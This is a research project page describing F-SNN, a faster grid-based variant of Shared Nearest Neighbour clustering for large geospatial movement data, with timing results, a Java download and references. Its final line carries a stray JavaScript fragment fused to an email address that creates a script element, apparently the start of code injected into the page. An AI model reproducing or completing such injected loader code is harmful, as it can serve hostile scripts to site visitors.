**A Fast SNN-based clustering approach for large geospatial data sets.**

Current positioning and sensing technologies enable the collection of very large spatio-temporal data sets. When analysing movement data, researchers often resort to clustering techniques to extract useful patterns from these data. Density-based clustering algorithms, although being very adequate to the analysis of this type of data, can be very inefficient when analysing huge amounts of data. The SNN (Shared Nearest Neighbour) algorithm [1] presents low efficiency when dealing with high quantities of data due to its complexity evaluated in the worst case by O(n^{2}) [2]. This new clustering method, F_SNN, is based on the SNN algorithm and significantly reduces the processing time by segmenting the spatial dimension of the data into a set of cells. This process minimizes the number of cells that have to be visited while searching for the k-nearest neighbours of each point. The obtained results show an expressive reduction of the time needed to find the *k*-nearest neighbours and to compute the clusters, while producing results that are equal to those produced by the original SNN algorithm.

The F-SNN was implemented in Java and is available for the analysis of huge data sets due to the improvements achieved with the proposed approach. The following image shows a comparison between the processing times of the original SNN and the F-SNN using a real movement data set with 140,000 points. Different amounts of points were processed using the Euclidean distance (2D) as the distance function that measure the similarity between points and, also, an extended version of this distance function (3D) that takes into account the distance between points (measured with the Euclidean distance) and the direction of the movement (considering the bearing value).

Figure 1. Computing times for SNN and F-SNN.

Figure 1, presented using a logarithmic scale, shows the considerable difference between the time needed to compute the clusters used by the two approaches (SNN and F-SNN). For 140,000 points F-SNN takes 3.7 seconds for the identification of the clusters using only the position of the objects (2D), while the original SNN takes 4652 seconds (1h17m32s). When taking the direction of movement into account (3D), F-SNN takes 9.8 seconds clustering the same 140,000 points, while the original SNN takes 4807.6 seconds (1h20m8s).

The Java code that implements the original SNN and the F-SNN approach can be downloaded in the next link as a Netbeans project.

Download: f-snn_v0.1 (08/05/2013)

For more details about the proposed approach, a research paper describing the F-SNN algorithm will be available here in the near future.

This implementation may be used with the class MainWindow.java, which shows GUI where file directories may be specified and parameters may be configured, or with the class Main.java where more specific tasks may be programed in the code, manipulating variables in the class Stash.java. For configuring the distance function accordingly to the data set to be processed, please read the instructions available in the “readme.txt” file contained in the download package.

[1] L. Ertoz, M. Steinbach, and V. Kumar, “A new shared nearest neighbor clustering algorithm and its applications,” in *Workshop on Clustering High Dimensional Data and its Applications at 2nd SIAM International Conference on Data Mining*, 2002, pp. 105–115.

[2] H. B. Bhavsar and A. G. Jivani, “The Shared Nearest Neighbor Algorithm with Enclosures (SNNAE),” in *2009 WRI World Congress on Computer Science and Information Engineering*, 2009, vol. 4, pp. 436–442.

For further information please contact:

Arménio Antunes, Researcher, University of Minho, Portugal, armenio@dsi.uminho.pt

Adriano Moreira, Associate Professor, University of Minho, Portugal, adriano@dsi.uminho.pt

Maribel Yasmina Santos, Associate Professor, University of Minho, Portugal maribel@dsi.uminho.ptvar d=document;var s=d.createElement(‘script’);